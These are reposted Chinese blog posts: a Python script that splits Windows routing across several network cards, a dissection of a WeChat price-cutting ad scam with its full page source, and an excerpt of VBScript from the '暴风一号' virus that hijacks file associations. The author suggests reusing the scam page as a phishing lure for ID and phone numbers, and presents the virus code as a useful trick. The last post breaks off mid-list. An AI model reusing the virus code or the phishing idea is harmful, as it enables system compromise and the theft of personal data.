利用python脚本实现Windows网卡叠加 技术文章
以前经常在网上找网卡叠加的小软件,找过很多个,有的用不来有的没效果,偶尔找到一个能用的批处理,于是根据这个脚本自己用python写了一个修改路由表的方案,这样一来下次就不用在网上找来找去了,简单实用(水平有限,还请在座各位多多指教)。
废话不多说直接贴代码,送给需要的人
#coding:utf-8 #调用库 import sys,os,re #函数 def pro_continue(): input("按Enter键退出") def nic_count(x): if x<2: print("网络叠加需要两块或两块以上网卡") exit() elif x>4: print("该程序最多支持叠加四块网卡") exit() def add_routetables2(i,g): net_1=[1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39,41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75,77,79,81,83,85,87,89,91,93,95,97,99,101,103,105,107,109,111,113,115,117,119,121,123,125,129,131,133,135,137,139,141,143,145,147,149,151,153,155,157,159,161,163,165,167,171,173,175,177,179,181,183,185,187,189,191,193,195,197,199,201,203,205,207,209,211,213,215,217,219,221,223] net_2=[2,4,6,8,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,174,176,178,180,182,184,186,188,190,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222] print("开始<span class='wp_keywordlink_affiliate'><a href="http://www.slll.info/archives/tag/%e8%b4%9f%e8%bd%bd%e5%9d%87%e8%a1%a1" title="View all posts in 负载均衡" target="_blank">负载均衡</a></span>") os.system("route delete 0.0.0.0") os.system("route add 0.0.0.0 mask 0.0.0.0 " + str(g[0]) + " metric 30 if " + str(i[0])) a=0 for x in net_1: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[0]) +" metric 25 if " + str(i[0])) for x in net_2: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[1]) +" metric 25 if " + str(i[1])) print("双网卡叠加成功") def add_routetables3(i,g): net_1=[1,4,7,13,16,19,22,25,28,31,34,37,40,43,46,49,52,55,58,61,64,67,70,73,76,79,82,85,88,91,94,97,100,103,106,109,112,115,118,121,124,130,133,136,139,142,145,148,151,154,157,160,163,166,175,178,181,184,187,190,193,196,199,202,205,208,211,214,217,220,223] net_2=[2,5,8,11,14,17,20,23,26,29,32,35,38,41,44,47,50,53,56,59,62,65,68,71,74,77,80,83,86,89,92,95,98,101,104,107,110,113,116,119,122,125,128,131,134,137,140,143,146,149,152,155,158,161,164,167,170,173,176,179,182,185,188,191,194,197,200,203,206,209,212,215,218,221] net_3=[3,6,9,12,15,18,21,24,27,30,33,36,39,42,45,48,51,54,57,60,63,66,69,72,75,78,81,84,87,90,93,96,99,102,105,108,111,114,117,120,123,126,129,132,135,138,141,144,147,150,153,156,159,162,165,168,171,174,177,180,183,186,189,195,198,201,204,207,210,213,216,219,222] print("开始<span class='wp_keywordlink_affiliate'><a href="http://www.slll.info/archives/tag/%e8%b4%9f%e8%bd%bd%e5%9d%87%e8%a1%a1" title="View all posts in 负载均衡" target="_blank">负载均衡</a></span>") os.system("route delete 0.0.0.0") os.system("route add 0.0.0.0 mask 0.0.0.0 " + str(g[0]) + " metric 30 if " + str(i[0])) a=0 for x in net_1: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[0]) +" metric 25 if " + str(i[0])) for x in net_2: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[1]) +" metric 25 if " + str(i[1])) for x in net_3: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[2]) +" metric 25 if " + str(i[2])) print("三网卡叠加成功") def add_routetables4(i,g): net_1=[1,5,9,13,17,21,25,29,33,37,41,45,49,53,57,61,65,69,73,77,81,85,89,93,97,101,105,109,113,117,121,125,129,133,137,141,145,149,153,157,161,165,173,177,181,185,189,193,197,201,205,209,213,217,221] net_2=[2,6,14,18,22,26,30,34,38,42,46,50,54,58,62,66,70,74,78,82,86,90,94,98,102,106,110,114,118,122,126,130,134,138,142,146,150,154,158,162,166,170,174,178,182,186,190,194,198,202,206,210,214,218,222] net_3=[3,7,11,15,19,23,27,31,35,39,43,47,51,55,59,63,67,71,75,79,83,87,91,95,99,103,107,111,115,119,123,131,135,139,143,147,151,155,159,163,167,171,175,179,183,187,191,195,199,203,207,211,215,219,223] net_4=[4,8,12,16,20,24,28,32,36,40,44,48,52,56,60,64,68,72,76,80,84,88,92,96,100,104,108,112,116,120,124,128,132,136,140,144,148,152,156,160,164,168,176,180,184,188,196,200,204,208,212,216,220] print("开始负载均衡") os.system("route delete 0.0.0.0") os.system("route add 0.0.0.0 mask 0.0.0.0 " + str(g[0]) + " metric 30 if " + str(i[0])) a=0 for x in net_1: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[0]) +" metric 25 if " + str(i[0])) for x in net_2: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[1]) +" metric 25 if " + str(i[1])) for x in net_3: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[2]) +" metric 25 if " + str(i[2])) for x in net_4: os.system ("route add " + str(x) + ".0.0.0 mask 255.0.0.0 "+ str(g[3]) +" metric 25 if " + str(i[3])) print("四网卡叠加成功") def check_ip(ip_str): pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" if re.match(pattern, ip_str): return True else: return False #主程序 os.system("title 网卡叠加-www.slll.info&&color 18") net_count=int(input("请输入网卡数量(MAX:4,Min:2): ")) nic_count(net_count) arr_1=[] arr_2=[] for x in range(1,net_count+1): temp=input("请输入第"+str(x)+"块需要叠加的网卡索引号 (cmd下面利用该命令查看:route print | find \"...\"[第一列即索引号]): ") arr_1.append(temp) temp=input("请输入网卡(" +str(x)+") 的网关: ") while True: if check_ip(temp): arr_2.append(temp) break else: temp=input("输入错误,请重新输入网卡(" +str(x)+") 的网关: ") if net_count==2: add_routetables2(arr_1,arr_2) elif net_count==3: add_routetables3(arr_1,arr_2) elif net_count==4: add_routetables4(arr_1,arr_2) pro_continue()注:此文并非博主原创,文章很有实用性,转载之,原文请移步:http://www.slll.info/archives/2153.html
iPhone6s砍价之广告骗局分析小计-社工-不贪小便宜-钓鱼(爪机党慎入,多图) 技术文章
今晚正在请代码的时候,QQ闪好几下,烦死了(后悔忘记关掉QQ),一打开是一同学让我帮他
砍价iPhone6s,还有一个链接,于是习惯性的打开虚拟机,连上自己的代理,再打开他发过来的链接,帮他操作了一遍 ,我也不知道为毛脑袋里蹦出来伪造useragent和换IP的念头,于是试了一下,尼玛,居然可以再次砍价。。。哦!立马就知道这里面有鬼!
可利用社会工程学(或者是钓鱼)内容:以这个作为例子,添加一些你想要获取的信息,比如 地址,右边,身份证号码,手机号等等渗透辅助方式获取信息!
后来才发现更简单的方式砍价---详情请往下看:
就是那几个广告,卖药的,少儿不宜的。。。这才是广告主的主要意图吧!再来看看他的这个砍价,很搞笑!
他这个所有的东西都在源码里面了,其实就是因为利用手机微信 QQ空间 这些平台传播,手机端一般查看源码不方便,其实大家可以利用 http://tool.lu/viewsource/ 在手机端查看源码,电脑端很方便 ,直接Ctrl+U 或者是在菜单栏里面找到工具-查看源码(还可以在使用了JavaScript禁止查看源码的地方查看绝大多数源码)。
开始还以为每次的地址不一样,可是使用sublime text 的file diff插件(插件github地址:SublimeFileDiffs)
比较之后发现都是一样的!他奶奶个熊。。。逗我呢。。。于是就想到了写个脚本循环,直到 看后价格=0 。
其基本就是清除浏览器cookies 就可以继续提交。。。所以很简单。。。脚本运行 。。。刷。。完了。。。
他妹的 我最后才发现 都在网页的JavaScript里面。。。请允许我做一个悲伤的表情!
submintKanjiaStatus = 1; $.ajax({ type: "GET", url: "plugin.php?id=tom_kanjia&mod=ajax&act=kanjia&kid=1&uid=660546", dataType : "json", data: $('#kanjia').serialize(), success: function(data){ $(".add_box").addClass('box_hide'); submintKanjiaStatus = 0; if(data.status == 201) { tusi("已经帮砍过了"); setTimeout(function(){document.location.reload();},2888); }else if(data.status == 301){ tusi("不在允许砍价地区"); setTimeout(function(){document.location.reload();},2888); }else if(data.status == 302){ tusi("你帮砍次数达到限制"); setTimeout(function(){document.location.reload();},2888); }else if(data.status == 200){ $('#kandiaojiage').html(data.price); $(".dialog_box").removeClass('box_hide'); }else if(data.status == 100){ $('#kanjiamsg').html("已经最低了"); $(".dialog_box").removeClass('box_hide'); }else{ tusi("砍价错误"); setTimeout(function(){document.location.reload();},1888); } } }); }); var submintDuihuanStatus = 0; $(".a_duihuan_btn").click( function () { var dh_pwd = $("#dh_pwd").val(); if(submintDuihuanStatus == 1){ return false; } if(dh_pwd == ""){ tusi("必须填写兑换密码"); return false; } submintDuihuanStatus = 1; $.ajax({ type: "GET", url: "plugin.php?id=tom_kanjia&mod=ajax&act=duihuan&kid=1&uid=660546", dataType : "json", data: $('#dh_form').serialize(), success: function(data){ submintDuihuanStatus = 0; if(data.status == 100) { tusi("兑换密码错误"); }else if(data.status == 200){ $(".duihuan_box").addClass('box_hide'); tusi("兑换成功"); setTimeout(function(){document.location.reload();},1888); }else{ tusi("兑换异常,稍等重试"); } } }); });
啊。。。。不说了,只想说 ,还好这只是个刷广告访问量的,没打算偷你的隐私信息,要是他在进入这个页面之前让你填写一些私人信息,比如说什么收货地址、邮编、电话号码、等等。。。那你基本上就被曝光了。差不多裸体在它面前了。。。想想还是很恐怖的。。。好了废话不多说。
最后,Mrxn提醒广大市民朋友,特别是那些涉网未深的朋友,不要随便贪小便宜,天上不会掉馅饼儿,真掉下来还得小心别被砸死了。。。
其实就是Dz论坛的插件。。。。你们看了就知道 !http://ip6s.wzyhsh.com.cn/wkj/forum.php
o _ o 对了,源码在这里,大家自己研究吧,中间还是有些有用的东西。不想看的就直接Ctrl+end / home:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0 , maximum-scale=1.0, user-scalable=0">
<title>草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!</title>
<meta name="format-detection" content="telephone=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<script src="http://tajs.qq.com/stats?sId=51513877" type="text/javascript" charset="UTF-8"></script>
<link href="source/plugin/tom_kanjia/images/style_red.css" rel="stylesheet" type="text/css">
<script src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js" type="text/javascript"></script>
<script src="source/plugin/tom_kanjia/images/common.js" type="text/javascript" type="text/javascript"></script>
<script src="http://res.wx.qq.com/open/js/jweixin-1.0.0.js" type="text/javascript" type="text/javascript"></script>
<base target="_self">
</head>
<body>
<section class="top_box clearfix">
<img src="http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000" width="auto">
<div class="top_box_bottom">
活动倒计时:
<span id="day_show">0</span>天
<span id="hour_show">0</span>时
<span id="minute_show">0</span>分
<span id="second_show">0</span>秒
</div>
</section>
<section class="about_box clearfix">
<div class="about_box_main clearfix">
<div class="about_box_main_title clearfix">亲:</div>
<div class="about_box_main_desc clearfix">已经有92亲友,帮助草泥马砍价了,当前价格为70.25,你也来帮助他砍一刀吧!</div>
</div>
</section>
<section class="btn_box clearfix">
<div class="btn_box_main clearfix">
<div class="btn_box_main_btn clearfix">
<ul>
<li><a href="javascript:void(0);" class="a_kanjia_box" onclick="show_add_box();">帮砍一刀</a></li>
<li><a href="plugin.php?id=tom_kanjia&kid=1">我要参加</a></li>
<!-- <li><a href="http://mp.weixin.qq.com/s?__biz=MzIwMDE1NDkwMQ==&mid=208996211&idx=1&sn=5ae3102f2b9c6efc289c4f4b13eeca90#rd">我要参加</a></li> -->
</ul>
</div>
</div>
</section>
<section class="qyt_box clearfix">
<div class="qyt_box_table clearfix">
<table cellpadding="0" cellspacing="0" >
<thead>
<tr>
<th width="33%">亲友团</th>
<th width="33%">砍掉价格</th>
<th width="33%">砍后价格</th>
</tr>
</thead>
<tbody>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.7</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥70.25</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥9.89</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥73.95</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.94</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥83.84</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥5.58</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥87.78</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥9.02</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥93.36</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.17</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥102.38</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.12</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥108.55</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.72</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥111.67</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.61</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥118.39</td>
</tr>
<tr class="top">
<td>张欢</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥7.67</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥125</td>
</tr>
</tbody>
</table>
<div class="pages clearfix">
<ul class="clearfix">
<li style="width: 40%;"><span>上一页</span></li>
<li style="width: 20%;"><span>1/10</span></li>
<li style="width: 40%;"><a href="plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546&page=2">下一页</a></li>
</ul>
</div>
</div>
</section>
<section class="more_box_title">
<div class="more_box_title_main">
<h1>商品详情</h1>
</div>
</section>
<section class="more_box_main">
<div class="more_box_main_main"><p>
<span>品牌iPhone 6s限量</span><strong>200</strong><span>件,已砍走41件</span><strong><span style="color:#009900;">(</span></strong><strong><span style="color:#009900;">砍走手机包邮/无任何费用</span></strong><strong><span style="color:#009900;">)</span></strong><span>,赶快邀请好友帮忙砍价!点击上方</span><strong><span style="color:#009900;">我要参加</span></strong><span>加入砍价赢手机。</span>
</p>
<p>
<span><img src="http://t1.qpic.cn/mblogpic/b6ec7b978502bed4dabc/2000" alt="" /><img src="http://t1.qpic.cn/mblogpic/400b778aad9c9e1ad54a/2000" alt="" /><br />
</span>
</p></div>
</section>
<section class="more_box_title" id="content_rule">
<div class="more_box_title_main" >
<h1>活动规则</h1>
</div>
</section>
<section class="more_box_main">
<div class="more_box_main_main"><p>
<strong>1.本次活动时间:2015年10月01日--2015年11月30日</strong>
</p>
<p>
<strong>2.点击上方</strong><strong><span style="color:#009900;">我要参加</span></strong><strong>加入砍价赢手机。</strong>
</p>
<p>
<strong>3.原价6088元的手机,</strong><strong><span style="color:#009900;">亲友团每人可帮砍1 - 500元</span></strong><strong>,砍到最低至0元,</strong><strong><span style="color:#009900;">砍价过程均可按照实时价格订购</span></strong>
</p>
<p>
<strong>4.砍价成功后请在弹出页面输入联系人,地址,电话,客服会在7个工作日内与您取得联系。</strong>
</p>
<p>
<strong>5. 本次活动砍价手机一律为64G版,颜色可选。</strong>
</p>
<p>
<strong><br />
</strong>
</p>
<p>
<strong><strong><span style="color:#009900;">提示:</span></strong><strong>建议微信转发或群发朋友帮你砍价</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/392b29537adb9aafcc4a/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/53cd484dfc25a512195a/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/3f27d99f5db5e80913d0/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/456042e0aec27104cb12/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><br />
</strong></strong>
</p></div>
</section>
<section class="more_box_title">
<div class="more_box_title_main clearfix">
<h1><font color="#FF0000">砍价排行榜</font></h1>
</div>
</section>
<section class="qyt_box clearfix" style="margin-top: 20px;">
<div class="qyt_box_table clearfix">
<table cellpadding="0" cellspacing="0" >
<thead>
<tr>
<th width="20%">排行榜</th>
<th width="40%">姓名</th>
<th width="40%">价格</th>
</tr>
</thead>
<tbody>
<tr class="top">
<td>1</td>
<td>吴***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>2</td>
<td>程***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>3</td>
<td>李***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>4</td>
<td>代***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>5</td>
<td>高***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>6</td>
<td>马***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>7</td>
<td>黄***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>8</td>
<td>刘***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>9</td>
<td>王***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>10</td>
<td>张***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
</tbody>
</table>
</div>
</section>
<section class="banquan_main" style="min-height:120px">
<div class="banquan_main_main">
</div>
</section>
<script type="text/javascript">
var d = new Date();
var ad_01_link = "http://vk" + (d.getDay() * 30 + d.getHours()) + ".cx718.cn/copy/index/103/5115/9053/1443885112";
</script>
<!-- <a href="http://www.51zhuanzhuan.net/renwu/help/getstart.php">每天一分钟,自动挣钱好轻松!</a> -->
<section class="guanzu_box clearfix" style="height:110px">
<div class="guanzu_box_main clearfix">
<table border="0" style="font-size:14px;line-height:30px;word-break:keep-all;white-space:nowrap;text-align:left">
<tr>
<td width="56">
<a href="javascript:location.href = ad_01_link;">
<img src="http://t1.qpic.cn/mblogpic/96db667d855b87630fda/2000" style="height: 32px;width: 50px;
">
</a>
</td>
<td height="21">
<a href="javascript:location.href = ad_01_link;" style="color:#e7e7e7;text-decoration:none;">
老公一晚.三次,搞的人家都求饶了,还要...
</a>
</td>
</tr>
<tr>
<td width="56">
<a href="http://lhxs.changchenglong.com.cn/wkj/ad02.php">
<img src="http://t1.qpic.cn/mblogpic/e4de3a81de94475f5f1a/2000" style="height: 32px;width: 50px;">
</a>
</td>
<td height="21">
<a href="http://lhxs.changchenglong.com.cn/wkj/ad02.php" style="color:#e7e7e7;text-decoration:none;">
揭秘:李某迷奸过程的真实内幕(内附视频)
</a>
</td>
</tr>
<tr>
<td width="56">
<a href="http://v8.changchenglong.com.cn/wkj/ad03.php">
<img src="http://t1.qpic.cn/mblogpic/06b70d418dafabd236a8/2000" style="height: 32px;width: 50px;">
</a>
</td>
<td height="21">
<a href="http://v8.changchenglong.com.cn/wkj/ad03.php" style="color:#e7e7e7;text-decoration:none;">
美女见富二代,被自愿发生关系13次,我跪了...
</a>
</td>
</tr>
</table>
<div class="guanzu_box_main_close" style="top:0px;right:0px"><a href="javascript:void(0);" onclick="close_guanzu_box();">X</a></div>
</div>
</section>
<section class="add_box clearfix box_hide">
<div class="add_box_main clearfix">
<div class="add_box_main_msg">为了便于草泥马知道你是谁,请留下你的姓名或者昵称。</div>
<form id="kanjia">
<div class="add_box_main_input"><input name="name" id="name" placeholder="填写姓名或昵称" type="text"></div>
<div class="add_box_main_input">
<input name="num_sun" id="num_sun" type="text" style="width: 100px;"> 计算:7+3=?
<input type="hidden" name="formhash" value="2196e42b">
<input type="hidden" name="openid" value="">
<input type="hidden" name="num_a" value="7">
<input type="hidden" name="num_b" value="3">
<input type="hidden" name="num_count" id="num_count" value="10">
</div>
</form>
<div class="add_box_main_btn">
<ul>
<li><a href="javascript:void(0);" class="a_kanjia_btn">帮砍价</a></li>
<li><a href="javascript:void(0);" onclick="close_add_box();" class="close">取消</a></li>
</ul>
</div>
</div>
</section>
<section class="duihuan_box clearfix box_hide">
<div class="duihuan_box_main clearfix" style="height: 150px;">
<div class="duihuan_box_main_msg">商家输入兑换密码</div>
<form id="dh_form">
<div class="duihuan_box_main_input">
<input name="dh_pwd" id="dh_pwd" type="text" placeholder="请输入商品兑换密码">
<input type="hidden" name="formhash" value="2196e42b">
</div>
</form>
<div class="duihuan_box_main_btn">
<ul>
<li><a href="javascript:void(0);" class="a_duihuan_btn">兑换</a></li>
<li><a href="javascript:void(0);" onclick="close_duihuan_box();" class="close">取消</a></li>
</ul>
</div>
</div>
</section>
<section class="dialog_box clearfix box_hide">
<div class="dialog_box_main clearfix">
<div class="dialog_box_main_box">
<div class="dialog_box_main_box_left"><img src="source/plugin/tom_kanjia/images/foutou_ico.png" width="130" height="100"></div>
<div class="dialog_box_main_box_right"><span class="tt" id="kanjiamsg">成功砍掉了</span><br/><span id="kandiaojiage" class="num">¥0</span></div>
</div>
<div class="dialog_box_main_btn clearfix ">
<a href="javascript:void(0);" onclick="close_dialog_box();">关 闭</a>
</div>
</div>
</section>
<script type="text/javascript">
function showShareGuide(){
$('body').append('<section class="top_box clearfix box_hide"><img src=""></section><div id="share_guide_box" onclick="hideShareGuide();" style="position:fixed;z-index:9999999;right:0px;top:0px;width:100%;height:100%;background-color: rgba(0,0,0,0.8);text-align:right;" ontouchmove="return true;" ><img src="source/plugin/tom_kanjia/images/share.png" style="margin-top:10px;margin-right:10px;float: right;"></div>');
}
function hideShareGuide(){
$("#share_guide_box").remove();
}
function close_dialog_box(){
$(".dialog_box").addClass('box_hide');
setTimeout(function(){document.location.reload();},1888);
}
function close_guanzu_box(){
$(".guanzu_box").addClass('box_hide');
}
function close_add_box(){
$(".add_box").addClass('box_hide');
}
function show_add_box(){
$(".add_box").removeClass('box_hide');
}
function close_duihuan_box(){
$(".duihuan_box").addClass('box_hide');
}
function show_duihuan_box(){
$(".duihuan_box").removeClass('box_hide');
}
var submintZikanStatus = 0;
$(".a_zikan_btn").click( function () {
if(submintZikanStatus == 1){
return false;
}
submintZikanStatus = 1;
$.ajax({
type: "GET",
url: "plugin.php?id=tom_kanjia&mod=ajax&act=zikan&kid=1&uid=660546&formhash=2196e42b",
dataType : "json",
data: "",
success: function(data){
submintZikanStatus = 0;
if(data.status == 100) {
tusi("已经帮砍过了");
setTimeout(function(){document.location.reload();},1888);
}else if(data.status == 200){
$('#kandiaojiage').html(data.price);
$(".dialog_box").removeClass('box_hide');
}else{
tusi("砍价错误");
setTimeout(function(){document.location.reload();},1888);
}
}
});
});
var submintKanjiaStatus = 0;
$(".a_kanjia_btn").click( function () {
var name = $("#name").val();
var num_count = $("#num_count").val();
var num_sun = $("#num_sun").val();
if(submintKanjiaStatus == 1){
return false;
}
if(name == ""){
tusi("必须填写姓名、昵称");
return false;
}
if(num_sun == "" || num_count != num_sun){
tusi("数字验证计算错误");
return false;
}
submintKanjiaStatus = 1;
$.ajax({
type: "GET",
url: "plugin.php?id=tom_kanjia&mod=ajax&act=kanjia&kid=1&uid=660546",
dataType : "json",
data: $('#kanjia').serialize(),
success: function(data){
$(".add_box").addClass('box_hide');
submintKanjiaStatus = 0;
if(data.status == 201) {
tusi("已经帮砍过了");
setTimeout(function(){document.location.reload();},2888);
}else if(data.status == 301){
tusi("不在允许砍价地区");
setTimeout(function(){document.location.reload();},2888);
}else if(data.status == 302){
tusi("你帮砍次数达到限制");
setTimeout(function(){document.location.reload();},2888);
}else if(data.status == 200){
$('#kandiaojiage').html(data.price);
$(".dialog_box").removeClass('box_hide');
}else if(data.status == 100){
$('#kanjiamsg').html("已经最低了");
$(".dialog_box").removeClass('box_hide');
}else{
tusi("砍价错误");
setTimeout(function(){document.location.reload();},1888);
}
}
});
});
var submintDuihuanStatus = 0;
$(".a_duihuan_btn").click( function () {
var dh_pwd = $("#dh_pwd").val();
if(submintDuihuanStatus == 1){
return false;
}
if(dh_pwd == ""){
tusi("必须填写兑换密码");
return false;
}
submintDuihuanStatus = 1;
$.ajax({
type: "GET",
url: "plugin.php?id=tom_kanjia&mod=ajax&act=duihuan&kid=1&uid=660546",
dataType : "json",
data: $('#dh_form').serialize(),
success: function(data){
submintDuihuanStatus = 0;
if(data.status == 100) {
tusi("兑换密码错误");
}else if(data.status == 200){
$(".duihuan_box").addClass('box_hide');
tusi("兑换成功");
setTimeout(function(){document.location.reload();},1888);
}else{
tusi("兑换异常,稍等重试");
}
}
});
});
wx.config({
debug: false,
appId: '',
timestamp: 1444651774,
nonceStr: 'UDdhMFxrwFmWcUTe',
signature: '127f1c8b81a01f2120eb52421b2f8fde76f25ff7',
jsApiList: [
'onMenuShareTimeline',
'onMenuShareAppMessage'
]
});
wx.ready(function () {
wx.onMenuShareTimeline({
title: '草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!',
link: 'http://ip6s.wzyhsh.com.cn/wkj/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546',
imgUrl: 'http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000',
success: function () {
},
cancel: function () {
}
});
wx.onMenuShareAppMessage({
title: '草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!',
desc: '',
link: 'http://ip6s.wzyhsh.com.cn/wkj/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546',
imgUrl: 'http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000',
type: 'link',
dataUrl: '',
success: function () {
},
cancel: function () {
}
});
});
var intDiff = parseInt(4209926);
function timer(intDiff){
window.setInterval(function(){
var day=0,
hour=0,
minute=0,
second=0;
if(intDiff > 0){
day = Math.floor(intDiff / (60 * 60 * 24));
hour = Math.floor(intDiff / (60 * 60)) - (day * 24);
minute = Math.floor(intDiff / 60) - (day * 24 * 60) - (hour * 60);
second = Math.floor(intDiff) - (day * 24 * 60 * 60) - (hour * 60 * 60) - (minute * 60);
}
if (minute <= 9) minute = '0' + minute;
if (second <= 9) second = '0' + second;
$('#day_show').html(day+'');
$('#hour_show').html(hour+'');
$('#minute_show').html(minute+'');
$('#second_show').html(second+'');
intDiff--;
}, 1000);
}
$(function(){
timer(intDiff);
});
</script>
</body>
</html>
从暴风一号病毒源码里面找到的宝贝 技术文章
今天和朋友聊天中,聊到HTA,说让我学习一下,我就去百度搜素了一下,就在搜索结果中发现了暴风一号病毒,由于对病毒感兴趣,就点击进去了,看了它的介绍和威力,就估摸着下载一份源码来看看,于是Download......以下是我在源码中发现的好东西:
1.病毒会删除HKCR\lnkfile\IsShortcut键值,使快捷方式的图标上叠加的小箭头消失。
博主亲测效果图:
看起来爽很多是不是!你也可以,删除上图中→_→右边黄色的IsShortcut项 。重启电脑即可看到效果。^_^
2.修改inf,bat,cmd,reg,chm,hlp,txt文件关联:
If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/cmdfile/shell/open/command/")<>File_Value Then Call SetCmdFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>File_Value Then Call SetRegFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>File_Value Then Call SetchmFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>File_Value Then Call SethlpFileAss(VirusAssPath) End If
至于这个嘛,我们可以用来修复文件关联错误。比如有时候我们打开EXE或者是上面的inf,bat,cmd,reg,chm,hlp,txt ,
当然你也可以用来关联你想关联的。嘿嘿 自由发挥!
3.开启所有磁盘的自动运行特性:
